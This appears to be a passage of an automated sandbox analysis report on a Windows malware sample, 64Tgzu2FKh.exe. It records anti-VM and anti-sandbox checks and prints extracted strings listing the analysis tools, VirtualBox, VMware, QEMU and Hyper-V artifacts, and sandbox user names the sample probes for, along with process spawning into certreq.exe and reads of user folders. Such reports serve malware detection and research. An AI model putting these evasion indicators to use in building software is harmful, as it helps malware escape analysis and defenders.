Source: C:\Windows\System32\certreq.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\certreq.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 0000000B.00000003.2050058689.00000000000E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 64Tgzu2FKh.exe PID: 4832, type: MEMORYSTR

Tries to detect Any.run

Source: C:\Users\user\Desktop\64Tgzu2FKh.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe			Jump to behavior
Source: C:\Users\user\Desktop\64Tgzu2FKh.exe	File opened: C:\Program Files\qga\qga.exe			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: 64Tgzu2FKh.exe, 0000000B.00000003.1512296461.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.2047031244.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.2046614643.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.1553353357.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCMON.EXE
Source: 64Tgzu2FKh.exe, 0000000B.00000003.2047031244.0000000035ADD000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.1512296461.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.2047031244.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.2046614643.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.1553353357.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HOOKEXPLORER.EXE
Source: 64Tgzu2FKh.exe, 0000000B.00000003.2047031244.0000000035ADD000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.1512296461.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.2047031244.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.2046614643.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.1553353357.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AUTORUNSC.EXE
Source: 64Tgzu2FKh.exe, 0000000B.00000003.2047031244.0000000035ADD000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.1512296461.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.2047031244.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.2046614643.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.1553353357.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OLLYDBG.EXE
Source: 64Tgzu2FKh.exe, 0000000B.00000003.2050058689.00000000000E2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WQLRANDOMRANDOM NAME%THISISANINVALIDFILENAME?[]<>@\;!-{}#:/~%%THISISANINVALIDENVIRONMENTVARIABLENAME?[]<>@\;!-{}#:/~%CMDVRT32.DLLCMDVRT64.DLLWPESPY.DLLVMCHECK.DLLPSTOREC.DLLDIR_WATCH.DLLAPI_LOG.DLLDBGHELP.DLLSBIEDLL.DLLSNXHK.DLLAVGHOOKA.DLLAVGHOOKX.DLLTESTAPP.EXEMYAPP.EXEKLAVME.EXETEST.EXEMALWARE.EXESANDBOX.EXEBOT.EXESAMPLE.EXEJOHN DOEVIRUSTEST USERMALTESTMALWARESAND BOXUSERTIMMYPETER WILSONMILOZSMILLERJOHNSONIT-ADMINHONG LEEHAPUBWSEMILYSANDBOXCURRENTUSERTEQUILABOOMBOOMFORTINETWIN7-TRAPSMUELLER-PCJOHN-PCHANSPETER-PCHAL9TH7SILVIAXPAMAST-SCSANDBOXWILBERT-SCCWSXXXXX-OXNMSDBOXCUCKOOCOMPUTERNAMEANDYANONYMOUSUSERC:\A\FOOBAR.GIFC:\A\FOOBAR.DOCC:\A\FOOBAR.BMPC:\123\EMAIL.DOCXC:\123\EMAIL.DOCC:\EMAIL.HTMC:\EMAIL.DOCC:\LOADDLL.EXEC:\TAKE_SCREENSHOT.PS1JOHNKLONE_X64-PCSYSTEMITADMINSWSCWILBERNUMBEROFCORESSELECT * FROM WIN32_PROCESSORROOT\CIMV2VIRTUALQEMUVMWAREVBOXVBOXVBOXVBOXPARALLELS HVPRL HYPERV XENVMMXENVMMVMWAREVMWAREMICROSOFT HVKVMKVMKVMA M IVIRTUALXEN0PARALLELSVMWARESERIALNUMBERSELECT * FROM WIN32_BIOSHVM DOMUVIRTUALBOXMODELSELECT * FROM WIN32_COMPUTERSYSTEMQEMUINNOTEK GMBHMANUFACTURERPROCESSORIDVMWXENVIRTIOSYSTEM\CURRENTCONTROLSET\ENUM\SCSISYSTEM\CURRENTCONTROLSET\ENUM\IDESELECT * FROM CIM_PHYSICALCONNECTOR06/23/99SYSTEMBIOSDATEVIRTUALBOXVIDEOBIOSVERSIONSYSTEMBIOSVERSIONIDENTIFIERHARDWARE\DEVICEMAP\SCSI\SCSI PORT 0\SCSI BUS 0\TARGET ID 0\LOGICAL UNIT ID 0HARDWARE\DESCRIPTION\SYSTEMVBOXSYSTEM\CONTROLSET001\SERVICES\VBOXVIDEOSYSTEM\CONTROLSET001\SERVICES\VBOXSFSYSTEM\CONTROLSET001\SERVICES\VBOXSERVICESYSTEM\CONTROLSET001\SERVICES\VBOXMOUSESYSTEM\CONTROLSET001\SERVICES\VBOXGUESTSOFTWARE\ORACLE\VIRTUALBOX GUEST ADDITIONSHARDWARE\ACPI\RSDT\VBOX__HARDWARE\ACPI\FADT\VBOX__HARDWARE\ACPI\DSDT\VBOX__SYSTEM32\VBOXCONTROL.EXESYSTEM32\VBOXTRAY.EXESYSTEM32\VBOXSERVICE.EXESYSTEM32\VBOXOGLPASSTHROUGHSPU.DLLSYSTEM32\VBOXOGLPACKSPU.DLLSYSTEM32\VBOXOGLFEEDBACKSPU.DLLSYSTEM32\VBOXOGLERRORSPU.DLLSYSTEM32\VBOXOGLCRUTIL.DLLSYSTEM32\VBOXOGLARRAYSPU.DLLSYSTEM32\VBOXOGL.DLLSYSTEM32\VBOXMRXNP.DLLSYSTEM32\VBOXHOOK.DLLSYSTEM32\VBOXDISP.DLLSYSTEM32\DRIVERS\VBOXVIDEO.SYSSYSTEM32\DRIVERS\VBOXSF.SYSSYSTEM32\DRIVERS\VBOXGUEST.SYSSYSTEM32\DRIVERS\VBOXMOUSE.SYS%PROGRAMW6432%\\.\PIPE\VBOXTRAYIPC\\.\VBOXTRAYIPC\\.\PIPE\VBOXMINIRDDN\\.\VBOXGUEST\\.\VBOXMINIRDRDNVBOXTRAYTOOLWNDVBOXTRAYTOOLWNDCLASSVIRTUALBOX SHARED FOLDERSVBOXTRAY.EXEVBOXSERVICE.EXEPCI\VEN_80EE&DEV_CAFEDEVICEIDSELECT * FROM WIN32_PNPENTITYOPENHCD82371SB82441FX82801FBNAMEVEN_VBOXPNPDEVICEIDCAPTIONSELECT * FROM WIN32_PNPDEVICEPNP_BUS_0PCI_BUS_0ACPIBUS_BUS_0SELECT * FROM WIN32_BUSORACLE CORPORATIONPRODUCTSELECT * FROM WIN32_BASEBOARDSOURCESSYSTEMFILENAMESELECT * FROM WIN32_NTEVENTLOGFILEVBOXWDDMVBOXVIDEOW8VBOXVIDEOVBOXVBOXVIRTUALBOXSYSTEMPRODUCTNAMESYSTEMMANUFACTURERHARDWARE\DEVICEMAP\SCSI\SCSI PORT 2\SCSI BUS 0\TARGET ID 0\LOGICAL UNIT ID 0HARDWARE\DEVICEMAP\SCSI\SCSI PORT 1\SCSI BUS 0\TARGET ID 0\LOGICAL UNIT ID 0SYSTEM\CONTROLSET001\CONTROL\SYSTEMINFORMATIONVMWARESOFTWARE\VMWARE, INC.\VMWARE TOOLSVMACTHLP.EXEVGAUTHSERVICE
Source: 64Tgzu2FKh.exe, 0000000B.00000003.2047031244.0000000035ADD000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.1512296461.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.2047031244.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.2046614643.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.1553353357.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: REGMON.EXE
Source: 64Tgzu2FKh.exe, 0000000B.00000003.2047031244.0000000035ADD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 5SSLASSO.EXEWIRESHARK.EXEFIDDLER EVERYWHERE.EXEFIDDLER.EXEIDA.EXEIDA64.EXEIMMUNITYDEBUGGER.EXEWINDUMP.EXEX64DBG.EXEX32DBG.EXEOLLYDBG.EXEPROCESSHACKER.EXEIDAQ64.EXEAUTORUNS.EXEDUMPCAP.EXEDE4DOT.EXEHOOKEXPLORER.EXEILSPY.EXELORDPE.EXEDNSPY.EXEPETOOLS.EXEAUTORUNSC.EXERESOURCEHACKER.EXEFILEMON.EXEREGMON.EXEWINDANR.EXE
Source: 64Tgzu2FKh.exe, 0000000B.00000003.1553353357.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCEXP.EXEPROCEXP64.EXETCPVIEW.EXETCPVIEW64.EXEPROCMON.EXEPROCMON64.EXEVMMAP.EXEVMMAP64.EXEPORTMON.EXEPROCESSLASSO.EXEWIRESHARK.EXEFIDDLER EVERYWHERE.EXEFIDDLER.EXEIDA.EXEIDA64.EXEIMMUNITYDEBUGGER.EXEWINDUMP.EXEX64DBG.EXEX32DBG.EXEOLLYDBG.EXEPROCESSHACKER.EXEIDAQ64.EXEAUTORUNS.EXEDUMPCAP.EXEDE4DOT.EXEHOOKEXPLORER.EXEILSPY.EXELORDPE.EXEDNSPY.EXEPETOOLS.EXEAUTORUNSC.EXERESOURCEHACKER.EXEFILEMON.EXEREGMON.EXEWINDANR.EXE
Source: 64Tgzu2FKh.exe, 0000000B.00000003.2047031244.0000000035ADD000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.1512296461.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.2047031244.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.2046614643.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.1553353357.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AUTORUNS.EXE
Source: 64Tgzu2FKh.exe, 00000000.00000002.1533953582.000000000050E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEW
Source: 64Tgzu2FKh.exe, 00000000.00000002.1535492627.0000000002AB0000.00000004.00001000.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000002.2114827084.0000000005720000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: 64Tgzu2FKh.exe, 0000000B.00000003.2047031244.0000000035ADD000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.1512296461.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.2047031244.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.2046614643.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.1553353357.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PETOOLS.EXE
Source: 64Tgzu2FKh.exe, 0000000B.00000003.2047031244.0000000035ADD000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.1512296461.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.2047031244.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.2046614643.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.1553353357.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WINDUMP.EXE
Source: 64Tgzu2FKh.exe, 0000000B.00000003.2047031244.0000000035ADD000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.1512296461.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.2047031244.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.2046614643.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.1553353357.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DUMPCAP.EXE
Source: 64Tgzu2FKh.exe, 0000000B.00000003.2047031244.0000000035ADD000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.1512296461.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.2047031244.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.2046614643.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.1553353357.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WINDANR.EXE
Source: 64Tgzu2FKh.exe, 0000000B.00000003.2047031244.0000000035ADD000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.1512296461.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.2047031244.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.2046614643.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.1553353357.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WIRESHARK.EXE
Source: 64Tgzu2FKh.exe, 0000000B.00000003.2047031244.0000000035ADD000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.1512296461.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.2047031244.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.2046614643.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000003.1553353357.0000000035AEE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FILEMON.EXE

Opens the same file many times (likely Sandbox evasion)

Source: C:\Users\user\Desktop\64Tgzu2FKh.exe

File opened: C:\Users\user\Videos\Tonishly\Unitten\Hyoscyamine.ini count: 49916

Jump to behavior

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\64Tgzu2FKh.exe

Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI

Jump to behavior

Source: C:\Users\user\Desktop\64Tgzu2FKh.exe TID: 4736

Thread sleep count: 1310 > 30

Jump to behavior

Source: C:\Users\user\Desktop\64Tgzu2FKh.exe

Thread sleep count: Count: 1310 delay: -5

Jump to behavior

Source: C:\Users\user\Desktop\64Tgzu2FKh.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth\Troubleshooting\Egueiite240\SharpDX.DXGI.dll

Jump to dropped file

Source: C:\Users\user\Desktop\64Tgzu2FKh.exe

Window / User API: threadDelayed 1310

Jump to behavior

Source: C:\Users\user\Desktop\64Tgzu2FKh.exe	File opened / queried: C:\Windows\SysWOW64\vboxservice.exe	Jump to behavior
Source: C:\Users\user\Desktop\64Tgzu2FKh.exe	File opened / queried: C:\Windows\SysWOW64\vboxtray.exe	Jump to behavior
Source: C:\Users\user\Desktop\64Tgzu2FKh.exe	File opened / queried: C:\Windows\SysWOW64\drivers\VBoxMouse.sys	Jump to behavior
Source: C:\Users\user\Desktop\64Tgzu2FKh.exe	File opened / queried: C:\Windows\SysWOW64\drivers\VBoxSF.sys	Jump to behavior
Source: C:\Users\user\Desktop\64Tgzu2FKh.exe	File opened / queried: C:\Windows\SysWOW64\vboxhook.dll	Jump to behavior
Source: C:\Users\user\Desktop\64Tgzu2FKh.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosDate	Jump to behavior
Source: C:\Users\user\Desktop\64Tgzu2FKh.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\64Tgzu2FKh.exe	File opened / queried: C:\Windows\SysWOW64\drivers\VBoxVideo.sys	Jump to behavior
Source: C:\Users\user\Desktop\64Tgzu2FKh.exe	File opened / queried: C:\Windows\SysWOW64\drivers\VBoxGuest.sys	Jump to behavior
Source: C:\Users\user\Desktop\64Tgzu2FKh.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Windows\System32\certreq.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\64Tgzu2FKh.exe	Code function: 0_2_0040595A GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_0040595A
Source: C:\Users\user\Desktop\64Tgzu2FKh.exe	Code function: 0_2_0040658F FindFirstFileW,FindClose,	0_2_0040658F
Source: C:\Users\user\Desktop\64Tgzu2FKh.exe	Code function: 0_2_00402862 FindFirstFileW,	0_2_00402862

Source: C:\Users\user\Desktop\64Tgzu2FKh.exe	API call chain: ExitProcess graph end node			graph_0-4968
Source: C:\Users\user\Desktop\64Tgzu2FKh.exe	API call chain: ExitProcess graph end node			graph_0-4960

Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Adobe	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Adobe\Acrobat	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA	Jump to behavior

Source: 64Tgzu2FKh.exe, 0000000B.00000003.2050058689.00000000000E2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware
Source: 64Tgzu2FKh.exe, 0000000B.00000002.2115468679.0000000005794000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\Windows\System32\vboxmrxnp.dll
Source: 64Tgzu2FKh.exe, 00000000.00000002.1615598106.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: 64Tgzu2FKh.exe, 00000000.00000002.1615598106.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: 64Tgzu2FKh.exe, 00000000.00000002.1615598106.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: 64Tgzu2FKh.exe, 0000000B.00000003.2047710499.00000000057A9000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000002.2114909158.0000000005748000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000002.2115468679.00000000057A9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 64Tgzu2FKh.exe, 0000000B.00000003.2050058689.00000000000E2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMWARE
Source: 64Tgzu2FKh.exe, 0000000B.00000003.2056599326.0000000034E51000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Y\MACHINE\SOFTWARE\VMware, Inc.\VMware Tools
Source: 64Tgzu2FKh.exe, 00000000.00000002.1535492627.0000000002AB0000.00000004.00001000.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000002.2114827084.0000000005720000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: 64Tgzu2FKh.exe, 00000000.00000002.1615598106.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: 64Tgzu2FKh.exe, 00000000.00000002.1533953582.000000000050E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exew
Source: 64Tgzu2FKh.exe, 0000000B.00000002.2115468679.0000000005794000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\Program Files (x86)\qemu-ga
Source: 64Tgzu2FKh.exe, 00000000.00000002.1615598106.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: 64Tgzu2FKh.exe, 0000000B.00000003.2050058689.00000000000E2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WQLrandomRandom name%ThisIsAnInvalidFileName?[]<>@\;!-{}#:/~%%ThisIsAnInvalidEnvironmentVariableName?[]<>@\;!-{}#:/~%cmdvrt32.dllcmdvrt64.dllwpespy.dllvmcheck.dllpstorec.dlldir_watch.dllapi_log.dlldbghelp.dllsbiedll.dllsnxhk.dllavghooka.dllavghookx.dlltestapp.exemyapp.exeklavme.exetest.exemalware.exesandbox.exebot.exesample.exeJohn Doevirustest usermaltestmalwaresand boxusertimmyPeter WilsonmilozsMillerJohnsonIT-ADMINHong LeeHAPUBWSEmilySandboxCurrentUserTEQUILABOOMBOOMFORTINETWIN7-TRAPSMUELLER-PCJOHN-PCHANSPETER-PCHAL9TH7SILVIAXPAMAST-SCSANDBOXWILBERT-SCCWSXXXXX-OXNMSDBOXCUCKOOCOMPUTERNAMEANDYAnonymousUSERC:\a\foobar.gifC:\a\foobar.docC:\a\foobar.bmpC:\123\email.docxC:\123\email.docC:\email.htmC:\email.docC:\loaddll.exeC:\take_screenshot.ps1JohnKLONE_X64-PCSystemITadminSWSCWilberNumberOfCoresSELECT * FROM Win32_ProcessorROOT\CIMV2virtualqemuvmwarevboxVBoxVBoxVBoxParallels Hvprl hyperv XenVMMXenVMMVMwareVMwareMicrosoft HvKVMKVMKVMA M IVirtualXen0ParallelsVMWareSerialNumberSELECT * FROM Win32_BIOSHVM domUVirtualBoxModelSELECT * FROM Win32_ComputerSystemQEMUinnotek GmbHManufacturerProcessorIdVMWxenvirtioSystem\CurrentControlSet\Enum\SCSISystem\CurrentControlSet\Enum\IDESELECT * FROM CIM_PhysicalConnector06/23/99SystemBiosDateVIRTUALBOXVideoBiosVersionSystemBiosVersionIdentifierHARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0HARDWARE\Description\SystemVBOXSYSTEM\ControlSet001\Services\VBoxVideoSYSTEM\ControlSet001\Services\VBoxSFSYSTEM\ControlSet001\Services\VBoxServiceSYSTEM\ControlSet001\Services\VBoxMouseSYSTEM\ControlSet001\Services\VBoxGuestSOFTWARE\Oracle\VirtualBox Guest AdditionsHARDWARE\ACPI\RSDT\VBOX__HARDWARE\ACPI\FADT\VBOX__HARDWARE\ACPI\DSDT\VBOX__System32\VBoxControl.exeSystem32\vboxtray.exeSystem32\vboxservice.exeSystem32\vboxoglpassthroughspu.dllSystem32\vboxoglpackspu.dllSystem32\vboxoglfeedbackspu.dllSystem32\vboxoglerrorspu.dllSystem32\vboxoglcrutil.dllSystem32\vboxoglarrayspu.dllSystem32\vboxogl.dllSystem32\vboxmrxnp.dllSystem32\vboxhook.dllSystem32\vboxdisp.dllSystem32\drivers\VBoxVideo.sysSystem32\drivers\VBoxSF.sysSystem32\drivers\VBoxGuest.sysSystem32\drivers\VBoxMouse.sys%ProgramW6432%\\.\pipe\VBoxTrayIPC\\.\VBoxTrayIPC\\.\pipe\VBoxMiniRdDN\\.\VBoxGuest\\.\VBoxMiniRdrDNVBoxTrayToolWndVBoxTrayToolWndClassVirtualBox Shared Foldersvboxtray.exevboxservice.exePCI\VEN_80EE&DEV_CAFEDeviceIdSELECT * FROM Win32_PnPEntityOpenHCD82371SB82441FX82801FBNameVEN_VBOXPNPDeviceIDCaptionSELECT * FROM Win32_PnPDevicePNP_BUS_0PCI_BUS_0ACPIBus_BUS_0SELECT * FROM Win32_BusOracle CorporationProductSELECT * FROM Win32_BaseBoardSourcesSystemFileNameSELECT * FROM Win32_NTEventlogFileVBoxWddmVBoxVideoW8vboxvideoVBOXvboxVirtualBoxSystemProductNameSystemManufacturerHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0SYSTEM\ControlSet001\Control\SystemInformationVMWARESOFTWARE\VMware, Inc.\VMware Toolsvmacthlp.exeVGAuthService
Source: 64Tgzu2FKh.exe, 0000000B.00000003.2056599326.0000000034E51000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools,Kgp(
Source: 64Tgzu2FKh.exe, 00000000.00000002.1615598106.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: 64Tgzu2FKh.exe, 0000000B.00000002.2115468679.0000000005794000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\Windows\System32\vboxhook.dll>gO
Source: 64Tgzu2FKh.exe, 0000000B.00000002.2115468679.0000000005794000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\Windows\System32\vboxtray.exekg
Source: 64Tgzu2FKh.exe, 00000000.00000002.1615598106.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: 64Tgzu2FKh.exe, 00000000.00000002.1615598106.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: 64Tgzu2FKh.exe, 0000000B.00000003.2050058689.00000000000E2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: 64Tgzu2FKh.exe, 00000000.00000002.1615598106.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: 64Tgzu2FKh.exe, 00000000.00000002.1615598106.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: 64Tgzu2FKh.exe, 00000000.00000002.1615598106.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat

Source: C:\Users\user\Desktop\64Tgzu2FKh.exe

Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_10001B18

Source: C:\Users\user\Desktop\64Tgzu2FKh.exe

Code function: 11_3_0008026A mov eax, dword ptr fs:[00000030h]

11_3_0008026A

Source: C:\Users\user\Desktop\64Tgzu2FKh.exe

Code function: 11_3_000802BF LdrInitializeThunk,LocalAlloc,LdrInitializeThunk,VirtualAlloc,LdrInitializeThunk,LdrInitializeThunk,LocalFree,LdrInitializeThunk,

11_3_000802BF

Source: C:\Users\user\Desktop\64Tgzu2FKh.exe

Process created: C:\Windows\System32\certreq.exe C:\Windows\system32\certreq.exe

Jump to behavior

Source: C:\Windows\System32\certreq.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Windows\System32\certreq.exe

Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Jump to behavior

Source: C:\Windows\System32\certreq.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\64Tgzu2FKh.exe

0_2_0040333D

